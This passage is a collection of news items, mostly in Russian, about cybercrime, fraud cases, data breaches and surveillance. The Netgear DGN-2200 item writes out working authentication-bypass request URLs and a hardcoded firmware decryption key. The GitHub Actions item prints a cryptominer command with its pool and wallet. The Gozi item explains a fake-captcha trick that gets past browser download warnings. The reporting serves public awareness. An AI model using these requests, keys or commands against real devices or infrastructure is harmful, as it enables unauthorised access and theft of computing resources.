Не сумев найти общий язык, израильская разведка накопала кучу компромата на супруга прокурораМУС, однако и это не помогло. И в конце 2020 годаБенсуда передала делоПалестины в палату предварительного производства.
В этот момент израильтяне обратились за помощью кСША, которым такжеМУС угрожал расследованиями военных преступлений вАфганистане.
По итогуСША ввели противБенсуды санкции и ограничения, сославшись на неконкретную информацию о финансовой коррупции и должностных преступлениях на самых высоких уровнях прокуратурыМУС.
В свою очередь, офицеры израильской разведки сами стали объектом расследования со стороныМУС, членов которого заблаговременно предупредили о слежке.
Теперь результаты на первых заголовках ведущих СМИБлижнего Востока и Запада, аБенсуда завершила расследование делаПалестины, положив начало процессу, который сейчас может привести к уголовным обвинениям.
В общем, демократия на демократии едет и демократией погоняет.
Сервис Proton Mail выдал данные пользователя правоохранительным органам, что привело к аресту подозреваемого по делу о терроризме – участника каталонской организации за независимость «Democratic Tsunami».
Недавно вновь возникли вопросы о конфиденциальности, когда Proton Mail предоставил испанской полиции резервный адрес электронной почты лица под псевдонимом «Xuxo Rondinaire». Подозревается, что этот человек — офицер полиции Каталонии (Mossos d’Esquadra), использовавший свои знания для помощи движению «Democratic Tsunami». Источники, близкие к расследованию, подтвердили, что подозреваемый действительно является действующим полицейским.
После получения информации о восстановленном адресе от Proton Mail, испанские власти обратились к Apple с запросом на предоставление дополнительных сведений, что привело к идентификации личности.
Случай выделяется тем, что включает серию запросов, затрагивающих разные юрисдикции и компании, подчеркивая сложное взаимодействие между технологическими фирмами, конфиденциальностью пользователей и правоохранительными органами.
Запросы были осуществлены на основании законов о борьбе с терроризмом, хотя основная деятельность «Democratic Tsunami» включала протесты и блокировки дорог, что вызывает вопросы о пропорциональности и обоснованности таких мер.
Proton Mail, следуя швейцарским законам, был обязан сотрудничать с международными правовыми запросами, формализованными через швейцарскую судебную систему. В прошлом году компания удовлетворила почти 6 000 запросов на выдачу данных. Proton Mail подчеркивает, что содержание писем, вложения и файлы всегда остаются зашифрованными и недоступными для чтения.
Комментирая ситуацию, Proton Mail заявил, что располагает минимальной пользовательской информацией, о чем свидетельствует тот факт, что в данном случае данные, полученные от Apple, использовались для идентификации подозреваемого в терроризме. Proton по умолчанию обеспечивает конфиденциальность, а не анонимность, поскольку анонимность требует определенных действий пользователя для обеспечения надлежащей операционной безопасности (OpSec), например, отказа от добавления учетной записи Apple в качестве дополнительного метода восстановления.
Данный случай напоминает о важности тщательного соблюдения операционной безопасности (OPSEC), особенно для пользователей, занимающихся политической деятельностью. Рекомендуется избегать связывания email или номеров телефонов для восстановления, которые могут напрямую указывать на личность, и рассмотреть возможность использования вторичных email или виртуальных номеров телефонов для дополнительной анонимности.
В деле также упоминается случай 2021 года, когда ProtonMail раскрыл IP-адреса ряда своих французских пользователей, связанных с «зеленым» движением Youth for Climate. Данные были предоставлены по запросу властей Франции, после чего выданные пользователи оказались под арестом.
Описанный случай – не единичный. В августе 2023 года ФБР смогло получить данные американского пользователя ProtonMail, обвиняемого в угрозах, а затем на основе этих данных вычислить его физическое местоположение и арестовать.
sc: elnacional.cat/en/politics/judge-garcia-castellon-accuse-mossos-police- officer-tsunami_1202609_102.html
Уголовный суд Таиланда вынес приговор супругам, которые организовали мошенническую схему и обманным путем привлекали инвесторов. Так, супружеской паре был назначен срок тюремного заключения на 12640 лет, однако из-за их признательных показаний, наказание было уменьшено до 5 056 лет. Кроме того, согласно законодательству Таиланда, срок тюремного заключения ограничен 20 годами, поэтому обвиняемые проведут в тюрьме лишь два десятилетия.
В процессе расследования выяснилось, что с марта по октябрь 2019 года девять человек, включая обвиняемых, размещали рекламу в социальных сетях, приглашая людей инвестировать в вымышленную сберегательную схему. Ожидаемым доходом было 93% от размера вложенных средств. Обманутые доверчивые граждане инвестировали в общей сложности 1,3 миллиарда батов (около 42 миллионов долларов).
Главная фигура мошеннической схемы, Вантани Типпавет, снимала видеоролики, показывая свою успешность и богатство, имитируя собственность на ювелирный магазин. Однако в ходе расследования выяснилось, что магазин был поддельным и состоял из прилавка, установленного в офисном помещении. Это помогло обманным путем привлечь новых инвесторов.
В результате расследования подозреваемые были обвинены в мошенничестве и преданы суду. Несмотря на то, что начально все девять причастных к мошеннической схеме были обвинены, суд признал виновными только двух из них – семейную пару Вантани Типпавет и Мети Чинпха. Семерых других обвиняемых освободили от ответственности из-за недостаточных улик.
Мошенническая схема, организованная коррумпированной парой, привлекла внимание тайских властей и средств массовой информации. Данное дело набрало огромную общественную резонанс, поскольку сумма ущерба, составлявшая 1,3 миллиарда батов, является крупной суммой для жителей Таиланда.
Хотя основным обвиняемым и были установлены строгие наказания, пожалуй, самый главный вопрос, который прозвучал после обнародования приговора, касался возможного возвращения реальных инвестиций и возмещения ущерба пострадавшим. На данный момент сведений относительно этого вопроса нет, однако следует обратить внимание на то, что правосудие многих стран сталкивается с подобными сложными вопросами. Правительство Таиланда сможет лишь надеяться на обеспечение защиты граждан от подобного рода мошенничеств и консолидацию национальных законов с целью предотвращения подобных преступных схем в будущем.
Исследователь заметил, что злоумышленники используют фейковую captcha, чтобы заставить пользователей обойти предупреждения браузеров и загрузить банковский троян Gozi (он же Ursnif).
Проблему обнаружил ИБ-исследователь MalwareHunterTeam, который поделился своими выводами с журналистами Bleeping Computer. Все началось с того, что эксперт нашел в сети подозрительный URL-адрес, где при попытке просмотреть встроенное YouTube-видео о женской тюрьме в Нью-Джерси загружался файл console-play.exe, а сайт отображал на экране фейковую версию reCaptcha.
Так как файл является исполняемым, Google Chrome автоматически предупреждает, что файл может быть вредоносным, и спрашивает, хочет ли пользователь «Сохранить» его или «Отменить» загрузку. Чтобы обойти это предупреждение, злоумышленники показывают жертве поддельную reCAPTCHA, где пользователя просят нажать на клавиатуре клавиши «B», «S», «Tab», «A», «F» и «Enter», как показано на скриншоте ниже.
Если при нажатии клавиш «B», «S», «A» и «F» ничего не происходит, то нажатие «Tab» переместит фокус на кнопку «Сохранить», а затем нажатие клавиши «Enter» сработает как клик по этой кнопке, заставляя браузер загрузить и сохранить файл на компьютер. Более того, видео в итоге начнет воспроизводиться автоматически, то есть пользователь решит, что успешно ввел captcha.
Если жертва запустит упомянутый исполняемый файл, тот создаст папку в %AppData%\Bouncy for .NET Helper и установит в нее множество файлов. Все эти файлы — фальшивка, за исключением исполняемого файла BouncyDotNet.exe.
BouncyDotNet.exe будет читать различные строки из реестра Windows, используемые для запуска команд PowerShell. Эти команды в итоге скомпилируют приложение .NET с помощью встроенного компилятора CSC.exe, который запустит DLL банковского трояна Ursnif . После запуска банкер похитит учетные данные жертвы, загрузит на компьютер дополнительную малварь и выполнит любые команды, переданные ему удаленными злоумышленниками.
• Source: https://www.bleepingcomputer[.]com/...ses-clever-captcha-to-bypass- browser-warning/
Прокуратура Костюковичского района поддержала в суде государственное обвинение по уголовному делу в отношении 26-летнего жителя Хотимска. Ему инкриминировано мошенничество, совершенное повторно, в крупном размере, сообщили в службе информации прокуратуры Могилевской области.
В ходе судебного следствия установлено, что обвиняемый с октября по декабрь 2018 года путем обмана завладел денежными средствами 25 граждан на общую сумму свыше Br7 тыс.
"Действуя по мошеннической схеме, он подыскивал на специализированных интернет-площадках объявления о продаже автомобилей. Затем созванивался с их владельцами и под предлогом приобретения машин просил переслать ему документы на продаваемые транспортные средства, - отметили в службе информации. - После их получения обвиняемый размещал на интернет-сайтах фиктивные объявления о продаже автомобилей по заниженной цене. Доверчивые граждане переводили деньги на его банковскую карту в счет предоплаты. Сумма варьировалась от Br100 до Br600. Затем молодой человек переставал выходить на связь".
Обвиняемый покинул территорию Беларуси и продолжил свои противоправные действия в России. Его задержали сотрудники полиции в Санкт-Петербурге, после чего экстрадировали в Беларусь.
В судебном заседании обвиняемый признал вину в полном объеме. "С учетом представленных доказательств суд Костюковичского района постановил обвинительный приговор. На основании ч.3 ст.209 УК ему назначено наказание в виде лишения свободы с отбыванием в исправительной колонии в условиях строгого режима на срок 3 года без штрафа", - сообщили в прокуратуре.
Приговором суда исковые требования потерпевших о возмещении причиненного им имущественного вреда удовлетворены. Приговор вступил в законную силу.
В прошивке к устройствам серии NETGEAR DGN-2200v1, сочетающим функции ADSL- модема, маршрутизатора и беспроводной точки доступа, [выявлены три уязвимости](https://www.microsoft.com/security/blog/2021/06/30/microsoft- finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft- and-full-system-compromise/), позволяющие выполнить любые операции в web- интерфейсе без прохождения аутентификации.
Первая уязвимость вызвана тем, что в коде http-сервера жёстко прошита возможность прямого обращения к картинкам, CSS и другим вспомогательным файлам, не требующая аутентификации. В коде имеется проверка запроса по маскам типовых имён файлов и расширений, реализованная через поиск подстроки во всём URL, в том числе в параметрах к запросу. В случае наличия подстроки страница отдаётся без проверки входа в web-интерфейс. Атака на устройства сводится к добавлению к запросу имени, присутствующего в списке, например, для обращения к настройкам WAN-интерфейса можно отправить запрос "https://10.0.0.1/WAN_wan.htm?pic.gif".
Вторая уявзимость вызвана использованием функции strcmp при сравнении имени пользователя и пароля. В strcmp сравнение осуществляется посимвольно до достижения отличий или символа с нулевым кодом, идентифицирующим окончанием строки. Атакующий может попытаться подобрать пароль, поэтапно перебирая символы и анализируя время до вывода ошибки аутентификации - если издержка увеличилась, значит подобран верный символ и можно переходить к подбору следующего символа в строке.
Третья уязвимость позволяет извлечь пароль из дампа сохранения конфигурации, который можно получить воспользовавшись первой уязвимостью (например, отправив запрос "http://10.0.0.1:8080/NETGEAR_DGN2200.cfg?pic.gif)". Пароль присутствует в дампе в зашифрованном виде, но для шифрования используется алгоритм DES и постоянный ключ "NtgrBak", который можно извлечь из прошивки.
Для эксплуатации уязвимостей должна быть возможность отправки запроса на сетевой порт, на которым выполняется web-интерфейс (из внешней сети атака может быть совершена, например, при помощи техники "DNS rebinding"). Проблемы уже устранены в обновлении прошивки 1.0.0.60.
Мошенническую схему разоблачили сотрудники управления противодействия киберпреступлениям в Харьковской области совместно со следственным управлением Харьковской полиции.
Организовали деятельность преступной группы 23-летние сожители. К противоправной деятельности они привлекли своих знакомых сверстников, для которых разработали детальные инструкции. Так, например, один из соучастников звонил пользователям торговой Интернет-площадки, которые размещали объявления о продаже товаров. Во время разговора фигурант имитировал желание совершить покупку и запрашивал у продавца реквизиты для оплаты. Также злоумышленник отмечал, что деньги за товар поступят к продавцу в определенное время.
Далее в указанное время потерпевшему звонил другой участник преступной группы, под видом работника службы безопасности банка и сообщал, что для зачисления денег необходимо активировать кредитную карту. Злоумышленники диктовали потерпевшим реквизиты подконтрольных счетов, выдавая их за коды активации кредитки. Таким образом они переводили деньги потерпевших на собственные счета. Общая сумма ущерба, нанесенного потерпевшим, достигает более миллиона гривен.
В домах фигурантов и в их автомобилях сотрудники полиции провели обыски. Изъяты компьютерная техника и мобильные телефоны. Обыски проводились с привлечением сотрудников полка полиции особого назначения полиции Харьковщины.
На данный момент пятерым фигурантам объявлено о подозрении по ст. 255 (Создание, руководство преступной организацией, а также участие в ней), ч. 3 ст. 190 (Мошенничество) Уголовного кодекса Украины. Подозреваемым грозит до двенадцати лет лишения свободы с конфискацией имущества. Решается вопрос об избрании меры пресечения. Следственные действия продолжаются. Процессуальное руководство осуществляет Харьковская областная прокуратура.
By Ax Sharma April 3, 2021 05:49 AM
GitHub Actions has been abused by attackers to mine cryptocurrency using
GitHub's servers in an automated attack.
GitHub Actions is a CI/CD solution that makes it easy to automate all your software workflows and setup periodic tasks.
The particular attack adds malicious GitHub Actions code to repositories forked from legitimate ones, and further creates a Pull Request for the original repository maintainers to merge the code back, to alter the original code.
But, an action is not required by the maintainer of the legitimate project for the attack to succeed.
BleepingComputer also observed the malicious code loads a misnamed cryptominer npm.exe from GitLab and runs it with the attacker's wallet address.
This week according to a Dutch security engineer security engineer Justin Perdok, attackers have targeted GitHub repositories that use GitHub Actions to mine cryptocurrency.
Repositories use GitHub Actions to facilitate CI/CD automation and scheduling tasks.
However, this particular attack abuses GitHub's own infrastructure to spread malware and mine cryptocurrency on their servers.
The attack involves first forking a legitimate repository that has GitHub Actions enabled.
It then injects malicious code in the forked version, and files a Pull Request for the original repository maintainers to merge the code back.
A screenshot shared by Perdok showed at least 95 repositories targeted by
the threat actor:
https://twitter.com/JustinPerdok/status/1377970380086902794?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1377970380086902794%7Ctwgr%5E%7Ctwcon%5Es1
&ref_url=https%3A%2F%2Fwww.bleepingcomputer[.]com%2Fnews%2Fsecurity%2Fautomated-
attack-abuses-github-actions-to-mine-cryptocurrency%2F_
But, in an unexpected twist, the attack does not need the maintainer of the original project to approve the malicious Pull Request.
Perdok [says](https://therecord.media/github-investigating-crypto-mining- campaign-abusing-its-server-infrastructure/) that merely filing the Pull Request by the malicious attacker is enough to trigger the attack.
As soon as a Pull Request is created for the original project, GitHub's systems would execute the attacker's code which instructs GitHub servers to retrieve and run a cryptominer.
The automated code invoked by the malicious Pull Request instructs GiHub
server to download a cryptominer hosted on GitLab which is mislabeled
npm.exe.
Misnamed cryptominer "npm.exe" hosted on GitLab
But this npm.exe has nothing to do with the offiical NodeJS installers or Node
Package Manager (npm). It is a known
cryptominer.
As analyzed by BleepingComputer, the attacker launches npm.exe cryptominer passing their wallet address as an argument, shown in bold below:
Code:Copy to clipboard
npm.exe --algorithm argon2id_chukwa2
--pool turtlecoin.herominers.com:10380
--wallet TRTLv3ZvhUDDzXp9RGSVKXcMvrPyV5yCpHxkDN2JRErv43xyNe5bHBaFHUogYVc58H1Td7vodta2fa43Au59Bp9qMNVrfaNwjWP
--password xo
In test runs by BleepingComputer, the EXE connected to the turtlecoin.herominers.com cryptocurrency pool and began its coin-mining activities:
Malicious npm.exe conducts cryptomining activities via attacker-provided
arguments and wallet address
Source: BleepingComputer
GitHub stated to The Record that they were aware of this activity, which was
being actively investigated.
This isn't the first time an attack leveraging GitHub infrastructure has abused GitHub Actions.
Previously, another programmer Yann Esposito had described an [identical attack](http://dev.to/thibaultduponchelle/the- github-action-mining-attack-through-pull-request-2lmc) in which an attacker had filed a malicious Pull Request against Esposito's GitHub project.
Last year, BleepingComputer also reported on GitHub being abused to host a wormable botnet Gitpaste-12 which returned the following month with over 30 exploits.
But, unlike Gitpaste-12 or the Octopus Scanner malware that targeted vulnerable projects and devices, as of now, this particular attack seems to be solely abusing GitHub servers for its cryptomining tasks.
Thanks to ANY.RUN for malware analysis VM access.
https://www.bleepingcomputer[.]com/news/security/automated-attack-abuses- github-actions-to-mine-cryptocurrency/
На этой неделе в блоге разработчиков DuckDuckGo появилась публикация, посвященная отказу от сторонних cookie. Создатели ориентированного на конфиденциальность поисковика предупреждают, что широко обсуждаемый план Google по отказу сторонних cookie в Chrome к концу 2022-2023 года, а также связанные с этим ограничения, уже реализованные в таких браузерах, как Brave, Firefox и Safari, не помешают производителям следить за пользователями.
«Чтобы действительно помешать Google и Facebook отслеживать вас на других сайтах, вы должны заблокировать загрузку их трекеров в вашем браузере при посещении других сайтов, — рассказывает глава DuckDuckGo Габриэль Вайнберг. — Недостаточно просто ограничить их после загрузки (например, запретив использовать сторонних файлов cookie)».
Click to expand...
Два наиболее распространенных трекера, теги Google Analytics и пиксель Facebook , могут быть реализованы посредством основных cookie, поэтому они не блокируются даже после ограничения сторонних файлов cookie. Вайнберг утверждает, что простая загрузка трекера (скрипта, изображение или файла cookie), это уже начало слежки:
«Трекер может собрать многое заранее, включая информацию о вашем устройстве (IP-адрес, user agent, заголовки HTTP и так далее). А также вашу информацию, которую сайт решит отправить вместе с ними (например, из основных файлов cookie)».
Click to expand...
В DuckDuckGo пишут, что, в сущности, существует множество способов отслеживания пользователей без сторонних cookie, например, IP-адреса, в сочетании с другими сетевыми данными, могут использоваться для фингерпринтинга и создания идентификатора браузера.
Вайнберг уверен, что технологии Google, предназначенные для замены сторонних файлов cookie, например, Federated Learning of Cohorts (FLoC), и связанные с ними методы доставки рекламы, якобы разработанные с упором на конфиденциальность, по-прежнему могут быть полезны для отслеживания людей. В частности, FLoC нацелен на присвоение пользователям идентификаторов групп интересов и может быть объединен с IP-адресом, в итоге став уникальным идентификатором конкретного человека.
«Таким образом, любой трекер, который получает и то и другое [идентификатор FLoC и IP-адрес], может использоваться для отслеживания и исключительно хорошо ориентироваться в поведении пользователя без сторонних файлов cookie и чего-либо еще», — подытоживает Вайнберг.
Click to expand...
Для защиты от такой слежки разработчики предлагают использовать браузерное расширение DuckDuckGo, доступное для Chrome, Firefox, Edge и Safari, а также мобильный браузер компании для iOS и Android.
Согласно тесту на время загрузки страницы от WebMD.com, расширение DuckDuckGo сократило время загрузки страницы для Chrome, Firefox и Safari (с настройками по умолчанию) с 20,2, 15,3 и 13,1 секунд до 9,9, 9,1 и 7,5 секунд соответственно, то есть в среднем на 46%.
Также расширение сократило объем передаваемых данных в среднем на 34% и количество запросов на загрузку файлов в Chrome, Firefox и Safari на 66% в среднем.
Источник: xakep.ru/2021/03/31/duckduckgo-preduprezhdaet-chto-otkaz-ot- storonnih-cookie-ne-meshaet-brauzernoj-slezhke/
Эксперты компании Forescout представили отчет о девяти уязвимостях в стеках TCP/IP, получивших общее название NAME:WRECK. Эти проблемы затрагивают сотни миллионов серверов, «умных» устройств, а также промышленное оборудование.
NAME:WRECK – это уже пятый набор уязвимостей, влияющих на библиотеки TCP/IP, который был обнаружен за последние три года. Достаточно вспомнить хотя бы такие "находки" экспертов, как Ripple20, URGENT/11 и Amnesia:33. Но все предыдущее исследования рассматривали различные механизмы TCP/IP, а исследование NAME:WRECK концентрируется на том, как библиотеки обрабатывают трафик DNS.
Специалисты Forescout пишут, что обнаружили в общей сложности девять уязвимостей, воздействующих на 7 из 15 стеков TCP/IP. Так, три стека уязвимы для ошибок, связанных со сжатием DNS-сообщений, обнаруженных в предыдущих исследованиях (таких как Ripple 20 и Amnesia: 33), и еще четыре стека уязвимы для новых багов, найденных во время проведения нового анализа.
Среди других восьми изученных библиотек FNET, cycloneTCP, uC /TCP-IP, FreeRTOS
 
Сообщается, что пока исправления выпустили только разработчики 3 из 4 уязвимых стеков: патчи подготовили FreeBSD, Nucleus NET и NetX, а создатели IPNet еще работает над решением проблем.
Хотя выпуск исправлений – это отлично, исследователи предупреждают, что на самом деле ситуация далека от идеала. Дело в том, что установка патчей на «умные» девайсы и промышленное оборудование обычно занимает долгое время, так как для этого производители устройств должны интегрировать исправления со своим кодом и выпустить собственные обновления прошивок. Затем эти обновления должны установить клиенты, что тоже может стать проблемой, ведь многие устройства установлены в удаленных местах и труднодоступны без механизма обновления прошивок «по воздуху» (FOTA), который поддерживают далеко не все девайсы.
Хуже того, лишь некоторые уязвимости из «набора» NAME:WRECK требуют, чтобы злоумышленник мог вмешиваться в DNS-трафик жертвы. Издание The Record, пообщавшееся с исследователями, пишет, что есть и другие уязвимости, которые могут использоваться для организации удаленных атак: злоумышленнику будет достаточно бомбардировать уязвимые системы искаженными ответами DNS.

Источник: xakep.ru/2021/04/13/name-wreck/
The Office of the Washington State Auditor (SAO) on Monday said it's investigating a security incident that resulted in the compromise of personal information of more than 1.6 million people who filed for unemployment claims in the state in 2020.
The SAO blamed the breach on a software vulnerability in Accellion's File Transfer Appliance (FTA) service, which allows organizations to share sensitive documents with users outside their organization securely.
"During the week of January 25, 2021, Accellion confirmed that an unauthorized
person gained access to SAO files by exploiting a vulnerability in Accellion's
file transfer service," the SAO said in a
statement
The accessed information is said to have contained personal details of
Washington state residents who filed unemployment insurance claims in 2020, as
well as other data from local governments and state agencies.
The exact information that may have been compromised include:
The unauthorized access incident is believed to have occurred in late December of last year, although it appears the full scope of the intrusion wasn't made aware until Accellion disclosed earlier this month that its file transfer application was the "target of a sophisticated cyberattack."
The Palo Alto-based cloud solutions company [said](https://www.accellion.com/company/press-releases/accellion-provides- update-to-recent-fta-security-incident/) on January 11 that it was made aware of a vulnerability in its legacy FTA software in mid-December, following which it claimed it addressed the issue and released a patch "within 72 hours" to the less than 50 customers affected.
Accellion also said it's contracting with an "industry-leading cybersecurity forensics firm" to investigate the incident.
Given that the compromised information can be abused to carry out identity theft or fraud, the SAO said it's in the process of arranging measures to protect the identities of those whose information may have been contained within SAO's files.
In the meanwhile, the agency recommends reviewing account statements and credit reports, notifying financial institutions of any suspicious activity, and reporting any suspected incidents of identity theft to law enforcement.
It's worth noting that Accellion's FTA software was used as an attack vector to strike two other organizations, including the Australian Securities and Investments Commission ([ASIC](https://asic.gov.au/about-asic/news- centre/news-items/accellion-cyber-incident/)) and the Reserve Bank of New Zealand ([RBNZ](https://www.reuters.com/article/us-newzealand-cyber/new- zealand-central-bank-governor-apologises-after-cyberattack-resulted-in- serious-data-breach-idUSKBN29K05M)), in recent weeks.
Молодой борисовчанин размещал в соцсетях объявления о продаже билетов на концерт популярной российской исполнительницы. Как оказалось, отправленные покупателям после получения оплаты билеты были поддельными - их изготавливал сам мошенник. Таким образом парень обманул несколько граждан. Об этом БЕЛТА сообщили в УВД Минского облисполкома.
В правоохранительные органы от 22-летней жительницы Логойска поступило заявление о том, что она была обманута молодым человеком на одной из популярных интернет-площадок. Пострадавшая от мошенничества девушка пояснила, что планировала приобрести билет на концерт популярной российской исполнительницы. Объявление о продаже билета она заметила случайным образом в интернете. Поскольку билетов в свободной продаже уже не было, девушка решила приобрести его с рук.
После непродолжительной переписки заявительница перевела Br140 на указанную продавцом банковскую карту (это было непременным условием продажи). Фигурант тут же отправил билет, который вызвал сомнения у покупательницы. Она немедля связалась с официальной площадкой по продаже билетов: ее сомнения подтвердились. Оказалось, злоумышленник с помощью компьютерной техники изготовил несколько фальшивых билетов.
Во время оперативных мероприятий личность продавца была установлена. Им оказался 18-летний учащийся одного из колледжей Борисова. Борисовский районный отдел следственного комитета возбудил уголовное дело. Установлено, что описанный факт обмана не единичен. Подобным образом борисовчанину удалось обмануть несколько жителей страны.
Coming from Symantec, a supply chain attack that previously targeted the network of enterprise communications service provider 3CX (read more here https://www.securitylab.ru/news/537385.php) also affected several critical infrastructures in European and US soil.
This attack is initially attributed to the Lazarus group. These actors infiltrated a software firm that claims hundreds of thousands of customers around the world in a cyberattack that showed quite advanced hacking capabilities. The breach of the software firm 3CX provided a potential foothold for the North Koreans into a huge swath of multinational firms – from hotel chains to health care providers – that use the firm’s software for voice and video calls.
They used a trojanized X_Trader software installer to deploy a multi-stage, modular VEILEDSIGNAL backdoor on victims' systems. Once installed, the malware can execute malicious shellcode and inject a C2 server communication module into Chrome, Firefox, or Edge processes. The C2 module creates a named pipe and listens for incoming messages, which it then sends to the C2 server.
Sources:
https://www.securitylab.ru/news/537385.php
https://www.securitylab.ru/news/537748.php
[https://web.archive.org/web/2023042...-hacking-supply-chain-3cx-
mandiant/index.html](https://web.archive.org/web/20230422131930/https://edition.cnn.com/2023/04/20/politics/north-
korea-hacking-supply-chain-3cx-mandiant/index.html)
[https://web.archive.org/web/2023042...04/lazarus-xtrader-hack-impacts-
critical.html](https://web.archive.org/web/20230424041053/https://thehackernews.com/2023/04/lazarus-
xtrader-hack-impacts-critical.html)
Блокчейн-сыщик ZachXBT обвинил одного из самых известных американских боксеров в рекламе подозрительных криптовалютных проектов и многочисленных случаях обмана инвесторов.
Флойд Мейвезер (Floyd Mayweather) последнее время часто писал о токене FLOYD. Однако затем внезапно удалил свои рекламные посты, вызвав опасения ZachXBT по поводу возможного провала криптопроекта.
Спортсмен часто реализовывал схемы накачки и сброса цены актива (пампа и дампа), способствуя искусственному завышению курса токенов перед тем, как обналичить собственные вложения. Оставляя при этом других вкладчиков с пустыми карманами. ZachXBT призвал подписчиков с осторожностью относиться к завуалированным призывам знаменитостей инвестировать в сомнительные токены.
Блокчейн-сыщик напомнил, что боксер уже получил прибыль в десятки миллионов долларов от проектов Mayweverse, Ethereum Max, Bored Bunny, Real Floyd NFT и Moonshot, а также от других криптопроектов, проводивших ICO в 2018 году. Перечисленные стартапы оказались мошенническими, подчеркнул ZachXBT. И риторически спросил у читателей: заслуживает ли Мейвезер доверия?
For those unfamiliar with all of his previous crypto/NFT related scams read this.
NFT scams: Mayweverse, RealFloydNFT, Promoted scams: Ethereum Max, Bored Bunny,
Moonshot, & 2018 ICOs. https://t.co/JaNLdhsPqR
— ZachXBT (@zachxbt) June 2, 2024__https://twitter.com/x/status/1797118639163764776
Click to expand...
В 2022 году один из инвесторов в токен Ethereum Max подал в суд на Флойда Мейвезера, обвинив спортсмена в сговоре с основателями проекта и продаже токенов на повышении цены. В 2018 году Комиссия по ценным бумагам и биржам США (SEC) оштрафовала боксера за продвижение мошеннического ICO.
USDC - 0.91
DAI - 0.92
На фоне краха SVB
Бывший сотрудник уже несуществующей биржи Cryptopia признал вину в краже криптоактивов стоимостью $245 000 NZD ($172 000 в USD). Кража не связана со взломом биржи в 2019 году, который привел к ее закрытию.
[Согласно публикации Stuff](https://www.stuff.co.nz/national/crime/125617315/excryptopia-staffer- admits-stealing-almost-250k-of-cryptocurrency), бывший сотрудник Cryptopia признался в краже криптоактивов с площадки. Во время работы на бирже сотрудник, чье имя не раскрывается, создал копии закрытых ключей Cryptopia, сохранил их на USB-накопитель, и загрузил данные на свой персональный компьютер дома.
На пике популярности новозеландская биржа, которая сейчас проходит процесс ликвидации после взлома в 2019 году, насчитывала более 80 сотрудников и обслуживала 1.4 млн клиентов по всему миру. В результате взлома были украдены криптоактивы на $16 млн.
В конце прошлого года компания Grant Thornton, занимающаяся ликвидацией Cryptopia, начала принимать заявки от пострадавших пользователей на возмещение убытков.
Сотрудник, чьи действия не связаны со взломом биржи, в сентябре прошлого года заявил Grant Thornton, что депонировал BTC в старый кошелек Cryptopia и попросил их вернуть. Компания изучила транзакции и обнаружила, что 13 BTC были выведены из нескольких кошельков.
Ликвидатор также выявил, что 2 BTC были проведены через миксер криптовалют в попытке скрыть их происхождение. Общая стоимость BTC на момент транзакции составляла около 235 000 NZD. Позже выяснилось, что были выведены еще около 10 000 NZD в других криптовалютах. После того, как Grant Thornton раскрыла полученную информацию, бывший сотрудник биржи признался в краже.
Затем он заявил, что намерен вернуть все украденные деньги при условии, что не будет привлечен к ответственности. Он сделал это на следующий день и сказал, что «все вернул».
«Обвиняемый признался, что был разочарован в Cryptopia, но также был уверен, что сможет избежать наказания за кражу, поскольку считал, что никто никогда не будет проверять старые депозитные кошельки», – говорится в публикации Stuff.
North Korean attacks on crypto exchanges reportedly netted an estimated $ 316m in cryptocurrency in 2019 and 2020, according to a [report](https://asia.nikkei.com/Politics/International-relations/North-Korea- cyberattacks-gained-300m-in-cryptocurrency-UN-panel) by Japan's Nikkei .
The outlet says it saw that figure in a draft of a United Nations report destined for the desk of the Security Council's North Korea Sanctions Committee.
That Committee's web page lists numerous reports that mention North Korea's interest in acquiring cryptocurrency by illegitimate means. The August 2020 interim report [PDF] by the Panel of Experts that monitors North Korea states: “One Member State reported that [North Korean] attacks against virtual currency exchange houses have produced more illicit proceeds than attacks against financial institutions.”
Иностранные СМИ сообщили 19-го января, что сервер на котором хранилась
информация о получателях помощи, которой управляет
Международный комитет Красного Креста(МККК) был взломан, а утекла личная
информация 515,000 человек, включая беженцев.
В тот же день федерация опубликовала заявление, в котором говорится "На этой
неделе сервер данных комитета подвергся кибератаке.
В утечку входит личная информация, тех кто разлучен со своими семьями или
пропал без вести из-за конфликтов, иммиграции, стихийных бедствий и т.д.
Эта информация была собрана и обработана более чем 60 организациями Красного
Креста по всему миру в ходе оказания помощи.
Кто осуществил кибератаку, пока не сообщается.
Штаб-квартира комитета находится в Женеве(Швейцария), а управление данными
передано в швейцарскую компанию, и как сообщается хакерская атака была
нацелена на компанию.
Сообщается, что эта информация еще не была предоставлена извне или загружена в
открытый доступ.
Комитет выразил обеспокоенность по поводу риска раскрытия конфиденциальной
личной информации беженцев и их семей, которых они защищали.
Генеральный директор международного комитета красного креста(МККК) Роберт
Мардини заявил "Мы потрясены, узнав что информация собранная в ходе
гуманитарной акции, стала целью атаки".
Он обратился к хакерам "Пожалуйста, поступайте правильно. Пожалуйста, не
делитесь и не продавайте эту информацию."
Из-за кибератаки комитет был вынужден отключить некоторые компьютерные системы
используемые для программ по воссоединению разлученных семей.
«Мы найдем решение как можно скорее, чтобы продолжить нашу важную работу», —
заявили в комитете.
За январь текущего года в Минской области возбуждено 341 уголовное дело по ст.212 (хищение путем использования компьютерной техники) УК, сообщили БЕЛТА в Следственном комитете.
Фиксируются такие преступления ежедневно, большинство из них связано с передачей реквизитов банковских карт, при этом способы совершения подобных преступлений постоянно модернизируются.
"Так, 26 декабря 2020 года в ходе телефонного разговора злоумышленник представился работником банка и предложил 36-летней жительнице Клецка установить на смартфон приложение удаленного доступа. Далее он сказал открыть мобильный банкинг, ввести данные, после чего завладел реквизитами банковской платежной карточки потерпевшей и похитил с ее карт-счета более Br200", - рассказали в ведомстве.
Еще один подобный случай произошел в Дзержинском районе 13 января. Неизвестный мужчина позвонил через мессенджер Viber 57-летней жительнице Фаниполя, представился сотрудником службы безопасности банка и сообщил, что во избежание хищения с банковской платежной карточки женщине необходимо установить аналогичное приложение, после чего похитил с карт-счета потерпевшей Br400.
Следователи просят обратить внимание, что подобное программное обеспечение позволяет установить удаленный доступ к мобильному телефону и наблюдать за происходящим на устройстве пользователя. "После того, как потерпевшие, следуя инструкции злоумышленников, разрешили им подключение к своим мобильным телефонам через вышеуказанное приложение, те смогли узнать реквизиты их банковских платежных карточек, авторизоваться от имени потерпевших и дистанционно распоряжаться их денежными средствами", - отметили в СК.
Действия неизвестных в обоих случаях квалифицированы по ч.2 ст.212 (хищение путем использования компьютерной техники, сопряженное с несанкционированным доступом к компьютерной информации) УК.
Сюрприз от Роскомнадзора: если у вас в соцсетях вдруг станет 10,000 друзей или
подписчиков
ведомство хочет получить в реестре каналов ВСЮ информацию о владельцах и
админах. А именно:
— ФИО, номер телефона и почту;
— Название канала и ссылку на него;
